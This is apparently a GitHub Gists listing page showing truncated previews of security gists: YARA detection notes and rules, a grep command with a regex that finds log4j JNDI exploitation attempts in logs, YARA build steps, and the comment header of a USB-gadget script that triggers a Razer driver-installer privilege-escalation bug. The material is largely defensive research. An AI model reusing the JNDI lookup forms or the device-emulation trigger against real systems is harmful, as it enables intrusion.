Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Today for #100DaysOfYARA I want to further explore one of my favorite topics | |
"How to reliably detect libraries", or how to identify that a particular program has linked or otherwise included a particular library. | |
Detecting libraries (especially ones written in C) pose unique challenges compared to malware, to include: | |
- libraries tend to be platform/architecture nonspecific | |
- compilerisms overwhelm otherwise decent signal | |
- copy/pasta and groupthink across libraries |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Today for #100DaysOfYARA I want to dive in to some of the dirty secrets of creating/maintaining code-based YARA signatures | |
Let's use SQLite3 as an example. Go get the source here (I prefer the amalgamation): | |
https://sqlite.org/download.html | |
I would like to reliably detect when a file is using SQLite. I often look at Windows executables, so I'm going to first concentrate on x86 programs that use this library. The easiest way to find them is to first concentrate on cleartext strings. In this case, I'm gonna pop over to VirusTotal and search for an easily-identifiable string: | |
content: "failed to allocate %u bytes of memory" type:pe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import sys, string, struct | |
def strByByte(_strval): | |
strval = bytearray(_strval.encode()) | |
for s in strval: yield s | |
def strByDword(_strval): | |
strval = bytearray(_strval.encode()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rule general_win_runkey_casing_anomaly : General | |
{ | |
meta: | |
author = "threatintel@volexity.com" | |
description = "Looks for files containing to a reference to the HKCU run key where the reference uses unusual casing." | |
date = "2021-08-03" | |
hash1 = "c20997c72508bc7340f4ec99fe9eb4f1ccde518e81bda66e7c86632f0748bffa" | |
memory_suitable = 0 | |
strings: |
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log
and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Goals for #100DaysofYARA: | |
better understanding of bitwise operators | |
use math module beyond general entropy of a section / resource | |
position specific things beyond what PE module tells us | |
do some funky stuff with hashing | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Download YARA (Modify if a different version is needed) | |
wget https://github.com/VirusTotal/yara/archive/refs/tags/v4.1.2.tar.gz | |
tar -zxf yara-4.1.2.tar.gz | |
cd yara-4.1.2 | |
./bootstrap.sh | |
# Prerequisites | |
sudo apt install automake libtool make gcc pkg-config libssl-dev | |
# Build with make |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID | |
# devices for triggering the vulnerable Windows Driver installer | |
# credits for the Windows Driver install vuln: @j0nh4t | |
# | |
# https://twitter.com/j0nh4t/status/1429049506021138437 | |
# https://twitter.com/an0n_r0/status/1429263450748895236 | |
# | |
# the script was developed & tested on Android LineageOS 18.1 |
NewerOlder